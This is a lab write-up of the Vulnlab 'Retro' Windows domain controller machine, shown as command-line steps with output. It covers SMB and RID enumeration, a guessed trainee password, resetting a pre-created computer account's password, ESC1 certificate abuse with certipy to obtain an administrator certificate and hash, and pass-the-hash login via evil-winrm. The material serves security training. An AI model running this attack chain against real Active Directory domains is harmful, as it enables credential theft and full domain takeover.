vulnlab-retro

vulnlab-retro

Let’s start with an Nmap scan.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt                                       
# Nmap 7.94SVN scan initiated Mon Jun  3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after:  2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-06-03T16:52:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

.

LDAP enum

➜  retro ldapsearch -x -H ldap://retro.vl -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl

try null auth

➜  retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

auth required

.

SMB

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient guest@retro -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 00:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

RID-Brute

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

Simple check user=pass

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'            
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

SMB check again with creds

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON        READ            Logon server share 
SMB         dc.retro.nl     445    DC               Notes           READ            
SMB         dc.retro.nl     445    DC               SYSVOL          READ            Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient trainee:trainee@retro.vl
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 00:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ 

pre-created computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, would have the password for the computer account the same as the computer account name in lowercase.

crackmapexec smb retro.vl -u 'BANKING$' -p 'banking'    
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings'
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE

To change the computer password we can use impacket-changepasswd script. The article also mentions using RPC over SMB as it results in errors. We can do so with the -p rpc-samr flag.

impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

ADCS check

I always 1st sync the system clock with the DC

┌──(puck㉿kali)-[~]
└─$ sudo ntpdate retro.vl      
2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap
CLOCK: time stepped by -1.338499

 

┌──(puck㉿kali)-[~] 
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users

look for vuln template

➜  retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

As we can see certipy-ad has flagged one template vulnerable to ESC1.

ESC1 allows us to request a certificate and supply the subject SPN. This is due to the EnrolleeSuppliesSubject flag set. We can use certipy-ad again and request a administrator certificate.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl               
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 16

Unfortunately, this has failed with the CERTSRV_E_KEY_LENGTH which means that the public key does not meet the minimum size required by the specified certificate template. Taking a look back at the certipy output we can see that the RetroClients certificate template requires minimum RSA key length of 4096 Bytes.

Fortunately, certipy-ad allows us to set the RSA key length with the -key-size flag.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

This works, we can now use auth module of certipy to get a valid TGT as administrator.

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116                                                                      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': *******************************:*******************************

We now own a administrator certificate which we can use to authenticate to the domain controller.

┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC

That’s all.

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *